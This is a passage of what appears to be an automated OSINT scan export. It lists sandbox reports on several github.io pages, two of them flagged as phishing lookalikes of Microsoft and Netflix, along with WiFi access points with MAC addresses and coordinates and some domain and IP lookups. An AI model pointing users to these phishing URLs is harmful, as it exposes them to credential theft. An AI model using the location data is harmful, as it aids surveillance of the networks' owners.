| 2023-05-12 03:00:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.18): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:53:17 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://github.com/twbs/bootstrap/blob/master/license)', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://dweb.link/ipfs/qmerdaetkpyon7z2jmmdsyxapkznfhrbf42ztgnxgcjtbq', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://portaili.github.io/micrcosoft.github.io', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2744"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_ab8_IE_EarlyTabStart_0xc64_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_ab8_ConnHashTable<2744>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_ab8_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_ab8_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n 
"{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_ab8_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "IsoScope_ab8_IE_EarlyTabStart_0xc64_Mutex"\n "IsoScope_ab8_IESQMMUTEX_0_331"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:80"\n "185.199.109.153:443"\n "192.229.173.207:443"\n "104.17.25.14:443"\n "104.18.10.207:443"\n "142.251.46.234:443"\n "104.18.11.207:443"\n "151.101.1.229:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"portaili.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajax.googleapis.com"\n "cdn.jsdelivr.net"\n "cdnjs.cloudflare.com"\n "maxcdn.bootstrapcdn.com"\n "portaili.github.io"\n "query.prod.cms.msn.com"\n "stackpath.bootstrapcdn.com"\n "teredo.ipv6.microsoft.com"\n "www.w3schools.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors 
marked dropped file "arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"microsoft_logo_ed9c9eb0dce17d752bedea6b5acda6d9_1_.png" has type "PNG image data 108 x 24 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{36b53e8b-eba4-11ed-a4f7-08002766a00c}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df3c90c2a7f75f2b91.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df44c8c92dba11d115.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{36b53e89-eba4-11ed-a4f7-08002766a00c}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file 
"c:\\users\\%osuser%\\appdata\\local\\temp\\~df3c90c2a7f75f2b91.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{36b53e8b-eba4-11ed-a4f7-08002766a00c}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df44c8c92dba11d115.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{36b53e89-eba4-11ed-a4f7-08002766a00c}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fa-solid-900_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh Copyright (c) Font AwesomeVersion 769.01171875 (Font Awesome version: 6.1.1)FontAwesome6Free-So"- [targetUID: N/A]\n "micrcosoft.github_1_.htm" has type "HTML document ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "all.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "jquery.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "fa-regular-400_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh"- [targetUID: N/A]\n "bootstrap.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "w3_1_.css" has type "UTF-8 Unicode (with BOM) text"- [targetUID: N/A]\n "popper.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- 
[targetUID: 00000000-00002744]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFF2E35B1698EDE394.TMP" has type "data"- Location: [%TEMP%\\~DFF2E35B1698EDE394.TMP]- [targetUID: 00000000-00002744]\n "~DF3C90C2A7F75F2B91.TMP" has type "data"- Location: [%TEMP%\\~DF3C90C2A7F75F2B91.TMP]- [targetUID: 00000000-00002744]\n "~DF44C8C92DBA11D115.TMP" has type "data"- Location: [%TEMP%\\~DF44C8C92DBA11D115.TMP]- [targetUID: 00000000-00002744]\n "~DF4FE4EBD509D90D4A.TMP" has type "data"- Location: [%TEMP%\\~DF4FE4EBD509D90D4A.TMP]- [targetUID: 00000000-00002744]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00002744]\n "_36B53E8B-EBA4-11ED-A4F7-08002766A00C_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._36B53E89-EBA4-11ED-A4F7-08002766A00C_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_3FDD343E-EBA4-11ED-A4F7-08002766A00C_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_4_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "jquery.session.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "microsoft_logo_ed9c9eb0dce17d752bedea6b5acda6d9_1_.png" has type "PNG image data 108 x 24 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "1ZCAIK0V.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1ZCAIK0V.txt]- [targetUID: 00000000-00002744]\n "7X6VIL59.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7X6VIL59.txt]- [targetUID: 00000000-00002744]\n "4QSK8L0L.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4QSK8L0L.txt]- [targetUID: 
00000000-00002744]\n "W2EMEB4O.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W2EMEB4O.txt]- [targetUID: 00000000-00002744]\n "XSDFEMWJ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XSDFEMWJ.txt]- [targetUID: 00000000-00002744]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "micrcosoft.github_2_.htm" has type "HTML document ASCII text with CRLF line | 185.199.109.153 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet55FA (Net ID: 00:01:36:59:55:F8) | 37.780462,-122.390564 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ENHLG (Net ID: 00:01:36:5B:37:00) | 37.780462,-122.390564 |
| 2023-05-12 03:08:54 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.70 | 34.74.170.74 |
| 2023-05-12 02:47:10 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://thewiki.moe/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "185.199.109.133:443"\n "162.159.133.233:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarF16C.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarF19D.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_970_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "IsoScope_970_IESQMMUTEX_0_303"\n "IsoScope_970_ConnHashTable<2416>_HashTable_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_970_IESQMMUTEX_0_519"\n 
"{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_970_IE_EarlyTabStart_0xde4_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2416"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_970_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2416"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabF18D.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabF15C.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 
00000000-00003360]\n "DREGU5ZL.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DREGU5ZL.txt]- [targetUID: 00000000-00002416]\n "CST1DE17.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CST1DE17.txt]- [targetUID: 00000000-00002416]\n "_289FBDBF-BAAA-11ED-BDE7-080027EC9596_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "214677895-b5497a9f-b78c-4c26-8ef3-880594c67e7a_1_.png" has type "PNG image data 950 x 530 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "VQLDZC3M.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\VQLDZC3M.txt]- [targetUID: 00000000-00002416]\n "RLS6I7B1.htm" has type "HTML document ASCII text with very long lines"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\RLS6I7B1.htm]- [targetUID: 00000000-00003360]\n "670S4DMD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\670S4DMD.txt]- [targetUID: 00000000-00002416]\n "~DF481D1D446E1EA5B6.TMP" has type "data"- Location: [%TEMP%\\~DF481D1D446E1EA5B6.TMP]- [targetUID: 00000000-00002416]\n "_DAE5D358-BAAA-11ED-BDE7-080027EC9596_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "QQF9N5N7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QQF9N5N7.txt]- [targetUID: 00000000-00003360]\n "CabF18D.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabF18D.tmp]- [targetUID: 00000000-00003360]\n "widget_1_.png" has type "PNG image data 320 x 76 8-bit/color RGB non-interlaced"- [targetUID: N/A]\n "VBEQR8NB.txt" has type "ASCII text"- Location: 
[%APPDATA%\\Microsoft\\Windows\\Cookies\\VBEQR8NB.txt]- [targetUID: 00000000-00003360]\n "RecoveryStore._289FBDBD-BAAA-11ED-BDE7-080027EC9596_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "lunr_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "retype_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://thewiki.moe/"\n Pattern match: "https://thewiki.moe"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /resources/js/lunr.js?v=2.4.0.730670946851 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://thewiki.moe/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: thewiki.moe\nDNT: 1\nConnection: Keep-Alive"\n "GET /resources/js/config.js?v=2.4.0.730670946851 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://thewiki.moe/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: thewiki.moe\nDNT: 1\nConnection: Keep-Alive"\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: 
en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: thewiki.moe\nDNT: 1\nConnection: Keep-Alive"\n "GET /resources/css/retype.css?v=2.4.0.730670946851 HTTP/1.1\nAccept: text/css, */*\nReferer: https://thewiki.moe/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: thewiki.moe\nDNT: 1\nConnection: Keep-Alive"\n "GET /resources/js/retype.js?v=2.4.0 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://thewiki.moe/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: thewiki.moe\nDNT: 1\nConnection: Keep-Alive"\n "}vG\nCWirDKlm-Re-@(\n\\y/Xr}\\nkddddDdd?z%{_\n<r=f0[]}_||,zpQ*2AO?COL2-d/IY~>),rI_g_=W%6a`s1{2R"ky2-t0J#"}M_s)=R:U(t`&Y2q|rF0zt]<iY&Vz,?XNS#]pEczz5TM9I$W)@(Ia<`ge(n/\'|nVXnwT)yvKeO\'d)g2+9]e.?eQOT2>WuA=9\nj)\'BDZtm9)cqg&\\2fe"e?}\nPkxdd2$mNz\\w.Ke(P^<KKe\n=KEeV>@<J")m\nkSQxMD/\\NJt.aH"d3NV+rsn.s\nMP<FbQN>2[.NY>2ILK\n*5|ay0m<%JY(A9dfK\\DV\nQXXw|>zz/|)zXvw?\\sAL\'RsEP.FCcU&%=OR2D,}P\'yy\nt@lb`@2}9h/`kNOLq\nXN~o\n 7UEnVf`XYf0@Vdsga$-yG#Ny~X^\n$,gI19&\n<{N3*i\\)-@1P%fn/nA\\bZ2MjABLK#8\\L3\'>p9*fF4f"[Ss[1\n*IQ\n675"#H1AK1M<{]d %DQdM4tg1)*INpD8&2+y\\nS8qlk!0dixv|RKI*\n]}H@oZRE"/U#Bb(FH(_2n:2[\nySOt}(Ke9[$4/r\n]`]$vA\nKpBH\nE.Z?_Qyr0t\n%\'<P3F:lHl9JsRO4$MHA\n@"\nUB`m!}#l!SHYv4"hkI\n2)3w+AM/9c.3`2\nys84bV5H`{ -ezV.3gt{KdPxXORQdt0\n\\(Ci`] l7wE6_T%9]c%v6j<+eQv 
cVsR\\)A~p_43M0r{W@;WfbN#AAKa>@IAIej-XaT5Lbap6Hv%a9*%Q*f\nc2cVjO@4\nJzT$OP`_|skYMC5JTXB4<L6s=A3A@v\n+g\n4c@=av464PmpV#V@;a"9t/7|<#(0Jj/}L4F\n,_{Qq>1Ybo\'\\bck<\\`yMjV!Hqss5__Q_l52V?|9L\n$q0rV+i"5Md/bv9A"KTkEWJ}H%EWQdOeF&Ac]7bjn\nOHq*(H.0e18mP||*fN)K$.^SviQ\\mc0{Q\'j?\\dR|^O9fXi\'8uq&hQD"#^s_`|+vo&u:d"=a.az_ReXVm4R#RI4rTSueK\\N\neKqH>>G;.Di8,mDQ29EiHA:"5{9HVDDqK6xm*hI\n#I&B_#t_1Ss)h{Z{xRQDaPk^2`7O/vy%VnoHg1~5+mxG\nU]uGLa`XdYD{PydV$eL2[G"|E]DvQ7y.fPp:\ne\nhlNqQEVp=GgQ%~;sR4&Ev$uWm+W&F%6"?`r\n~vwS*F^0owy&v9snM\n4T\n!)uV]"/WeP9vl*[D@+6%#\nw*o Vi,>n5[kcuvvr}udQ 2G42!\nXl9bK\'&x`*Pzgi[j3^f\\NP^OP8dzuJZPfTNbl7 TqqI~CRU0$<P\\W\n5US8\nPx?,/:,c=`igo}oCsH.~o>S9kcv*,7^U9Eo;MA\\\n"ToQJRbDQ/|w|\n)^{A.PU.%X#VAe\nT!wwGWS\nC8"#Ksg77,(Rw9J+R|fV+X~v4muQQ[k\n\'j3Tp5>O_R#UfaHt2^Z\'RdoR\n/\nwg=[+KB#<N"McoktG>l`asGNCDjmtA(^:T5-Qj"H!8inMMNP!mP6_5QSqaXcWH9F<F2Z*4NeE19ts<QG%)h7-;zW-}+Ml*rV\\U<A | 185.199.111.153 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:01:24:F0:65:67) | 37.780462,-122.390564 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | JIVE5.02025B0 (Net ID: 00:01:9F:20:25:B4) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:03:23 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dontkillmyapp.com | 000.dontkillmyapp.com |
| 2023-05-12 02:51:18 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://swetapanda25.github.io/netflix', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "IsoScope_55c_IE_EarlyTabStart_0xfc8_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_55c_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_55c_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1372"\n "IsoScope_55c_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "IsoScope_55c_ConnHashTable<1372>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_55c_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_55c_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_55c_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "45.57.90.1:443"\n 
"104.17.24.14:443"\n "52.217.109.118:443"\n "104.18.23.52:443"\n "156.146.53.12:443"\n "142.250.191.42:443"\n "172.64.101.10:443"\n "142.251.32.35:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.nflxext.com"\n "cdnjs.cloudflare.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "ka-f.fontawesome.com"\n "kit.fontawesome.com"\n "maxst.icons8.com"\n "s3.amazonaws.com"\n "swetapanda25.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"RS-en-20191230-popsignuptwoweeks-perspective_alpha_website_large_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "device-pile_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "mobile_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"\n "netflix-logo_1_.png" has type "PNG image data 800 x 454 8-bit/color RGBA non-interlaced" and extension 
